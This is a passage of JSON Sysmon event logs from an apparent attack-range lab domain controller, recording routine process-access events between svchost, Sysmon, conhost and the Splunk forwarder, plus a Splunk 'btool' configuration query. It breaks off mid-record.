{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3547,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3548,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.696\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-0010507D0500}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.696","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010507D0500}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.930\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010507D0500}\r\nSourceProcessId: 4624\r\nSourceThreadId: 4628\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nTargetProcessId: 1828\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.930","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010507D0500}","SourceProcessId":"4624","SourceThreadId":"4628","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","TargetProcessId":"1828","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.970\r\nProcessGuid: {E2A3D6B1-1103-5F25-0000-00100F800500}\r\nProcessId: 3468\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00109B7A0500}\r\nParentProcessId: 4432\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 